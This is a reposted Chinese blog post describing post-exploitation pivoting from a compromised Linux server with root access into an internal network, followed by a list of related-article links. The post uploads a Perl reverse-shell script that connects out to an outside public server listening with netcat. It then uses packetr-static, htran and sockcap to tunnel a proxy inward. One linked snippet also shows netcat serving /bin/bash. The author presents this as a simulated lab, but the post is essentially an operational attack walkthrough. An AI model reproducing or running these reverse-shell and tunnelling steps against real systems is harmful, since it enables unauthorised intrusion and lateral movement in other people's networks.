Linux下的内网反弹实例

最新推荐文章于 2024-04-22 15:46:40 发布
最新推荐文章于 2024-04-22 15:46:40 发布 · 105 阅读 · 0
文章标签:

#运维 #shell

本文介绍了一种在特定条件下实现从受控Linux服务器通过web端口80进行内网反弹的方法。利用Perl脚本配合网络工具如nc、packetr-static及htran等,在目标Linux服务器(192.168.0.105)与公网服务器(61.160.2xx.xxx)间建立连接,并通过sockcap进一步渗透内网。

环境:

被攻陷的Linux主机(拿到root权限)-----模拟为我内网的一台Linux服务器 192.168.0.105

hack的操作用机-----我的电脑 192.168.1.101

反弹到公网的服务器-----我自己的公网服务器 61.160.2xx.xxx

渗透测试用的windows测试机 192.168.1.109

工具:

packetr-static Linux下的

htran.exe windows下的

sockcap 用作代理进入内网渗透的利器

过程:

1.我模拟下极度苛刻的情况下的环境,该攻陷的Linux服务器对外不开放22,只存在web端口80,那么我们必须得反弹shell到公网的机器上,这点我虚拟机里面没 这个环境,我就直接说下简要的

上传back.pl文件到linux下的tmp目录下,执行

perl /tmp/back.pl xxx.xxx.xxx.xxx 端口

在公网的服务器上,运行nc执行

nc -l -v -p 端口(跟上面的一样)

现在我弹2个窗口回来,一个开代理,一个转发数据

把packetr-static传上去,执行

./packetr-static -s 1988


一个窗口转发数据,执行

./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988


2.在windows公网端执行,

htran.exe -p -listen 123 1988


3.配置sockcap


4.运行代理程序进入内网

本文来自优快云博客,转载请标明出处:file:///C:/Documents%20and%20Settings/Administrator/桌面/Linux下的内网反弹实例%20-%20linkboy的BLOG%20-%20优快云博客.mht

iteye_11341
关注
红队内网攻防渗透:内网渗透之内网对抗:Linux权限提升-&Vulnhub&Rbash绕过&Docker&LXD镜像&History泄漏
HACKONE的博客
06-15 389
Docker是一个开源的容器化平台,它建立在LXC之上,并提供了一套更高级别的工具和API,使得容器的构建、分发和运行变得更加简单。Docker提供了一个容器镜像的集装箱模型,使得容器可以在不同的环境中进行移植和部署。而Docker是基于LXC的容器化平台,提供了一套简化容器构建、分发和运行的工具和API。LXD是基于LXC容器的管理程序,当前用户可操作容器,理解为用户创建一个容器,再用容器挂载宿主机磁盘,LXD、LXC 和 Docker 是三种不同的容器化技术,它们在实现和使用上有一些区别。
Nginx无法启动:bind() to 0.0.0.0:443 failed
Mr_Chenn的博客
08-09 1万+
今天Nginx启动弹窗一闪就消失了,使用nignx -t -c [配置文件路径]检查conf文件报错如下。 bind to 0.0.0.0:443 failed.其实就是443端口被其它程序占用,要结束占用443端口导致nginx不能启动的应用。 CMD: 1.查看所有程序使用的端口netstat -aon 也可以使用netstat -aon|findstr "443",直接找到...
nginx报bind() to 0.0.0.0:443 failed错导致无法启动
liuqingup的专栏
06-25 3815
最近遇到了一个问题,启动Nginx时出现了"bind() to 0.0.0.0:443 failed"的错误,导致Nginx无法启动。
nginx: [emerg] bind() to 0.0.0.0:4433 failed (98: Address already in use)、
最新发布
wangjun5159的专栏
04-22 1421
今天遇到两个nginx问题`nginx: [emerg] bind() to 0.0.0.0:4433 failed (98: Address already in use)` 和```no "ssl_certificate" is defined in server listening on SSL port while SSL handshaking```
Linux下的内网反弹实例.txt
01-09
Linux系统安全学习
Linux主机内网穿透
wyn_test的博客
07-28 1573
为什么写博客 大佬们都有个人主页或者优快云博客,本着计科学生的好奇精神,我也学习着,将近期的一个小项目写出来,望批评指正! 文章内容 不少同学会有这样的问题:在学校、公司或家里的个人电脑上搭建了个人站或者配置了服务器,需要但是无法在其他地方访问到。这时可以利用另一台处于外环境下的主机做一个转发,帮助外访问到NAT后的内网环境下的服务器。 文章提供了亲测的两种简单而且稳定的工具,利用阿里云E...
精选资源
python 实现socket通信实例之client.py
09-04
python 实现socket通信实例之client.py socket又称套间字或者插口,是络通信中必不可少的工具。有道是:“无socket,不络”。由于socket最早在BSD Unix上使用,而Unix/Linux所奉为经典的至高哲学是“一切皆是...
python 实现socket通信实例之server.py
09-04
python 实现socket通信实例之server.py socket又称套间字或者插口,是络通信中必不可少的工具。有道是:“无socket,不络”。由于socket最早在BSD Unix上使用,而Unix/Linux所奉为经典的至高哲学是“一切皆是...
nc端口监听工具瑞士军刀
03-11
什么是nc nc是netcat的简写,有着络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的扫描,nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间络测速                                                                                                                                                                                                                         nc的控制参数不少,常用的几个参数如下所列: 1) -l 用于指定nc将处于侦听模式。指定该参数,则意味着nc被当作server,侦听并接受连接,而非向其它地址发起连接。 2) -p 暂未用到(老版本的nc可能需要在端口号前加-p参数,下面测试环境是centos6.6,nc版本是nc-1.84,未用到-p参数) 3) -s  指定发送数据的源IP地址,适用于多卡机  4) -u  指定nc使用UDP协议,默认为TCP 5) -v 输出交互或出错信息,新手调试时尤为有用 6)-w 超时秒数,后面跟数字  7)-z 表示zero,表示扫描时不发送任何数据       前期准备 准备两台机器,用于测试nc命令的用法 主机A:ip地址 10.0.1.161 主机B:ip地址 10.0.1.162   两台机器先安装nc和nmap的包 yum install nc -y yum install nmap -y 如果提示如下-bash: nc: command not found 表示没安装nc的包 ———————————————— 版权声明:本文为优快云博主「小毛毛2013」的原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接及本声明。 原文链接:https://blog.youkuaiyun.com/u012486730/article/details/82019996
could not bind to address 0.0.0.0:443 no listening sockets available, shutting d
ldl_xz的专栏
03-17 847
could not bind to address 0.0.0.0:443 no listening sockets available, shutting d
linux 查看进程套接字,linux – 如何找到哪个进程绑定套接字而不是监听?
weixin_34260080的博客
05-13 364
当我使用nc来监听端口时,它会显示出来nc -l -vv -p 21000retrying local 0.0.0.0:21000 : Address already in use Can't grab 0.0.0.0:21000 with bind但是我无法使用工具netstat / ss找到哪个任务占用了这个端口netstat -an|grep 21000没有找到ss -a|grep 2100...
Linux的capability深入分析(2)
热门推荐
wangpengqi的专栏
08-07 1万+
一)capability的工具介绍 在我们的试验环境是RHEL6,libcap-2.16软件包中包含了相关的capability设置及查看工作,如下: rpm -ql libcap-2.16-5.2.el6.i686  /lib/libcap.so.2 /lib/libcap.so.2.16 /lib/security/pam_cap.so
【Nginx】bind() to 0.0.0.0:443 failed 错误排查方法
daohangtaiqian的博客
02-09 1692
在windows10 系统上启动打包项目起不来,一看是nginx端口被占用了。所以要干掉这个程序,但是万一是重要系统在使用443端口呢,所以一定要看清楚。在这里能看到所占用端口的名称信息:如果需要结束,右键结束就好了。
nginx 无法启动:bind() to 0.0.0.0:443 failed
牛奔的博客
12-04 4910
bind to 0.0.0.0:443 failed.其实就是443端口被其它程序占用,要结束占用443端口导致nginx不能启动的应用。 CMD: 1.查看所有程序使用的端口netstat -aon 也可以使用netstat -aon|findstr "443",直接找到使用443端口的程序: 可以看到PID为6416的程序占用了本机443端口。 接下来找到进程号为6416的程序,结束...
linux怎么查看进程的套接字,linux – 如何找到哪个进程绑定套接字而不是监听?...
weixin_29051245的博客
04-30 188
当我使用nc来监听端口时,它会显示出来nc -l -vv -p 21000retrying local 0.0.0.0:21000 : Address already in use Can't grab 0.0.0.0:21000 with bind但是我无法使用工具netstat / ss找到哪个任务占用了这个端口netstat -an|grep 21000没有找到ss -a|grep 2100...
用nc反弹shell真有意思哈哈
公众号shadow sock7
06-17 1万+
先在bee(192.168.170.130)上面bee@bee-box:/tmp$ nc -vlp 4444 -e /bin/bash listening on [any] 4444 ... 192.168.170.1: inverse host lookup failed: Unknown host connect to [192.168.170.130] from (UNKNOWN) [192.
linux内网渗透反弹shell
08-03
Linux内网渗透中,反弹shell是一种常见的技术手段。其中,Bash反弹shell是最简单且最常见的一种方式。首先,在攻击机上使用nc命令监听一个端口。然后,在目标机器上使用Python脚本去反向连接攻击机的IP和端口。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值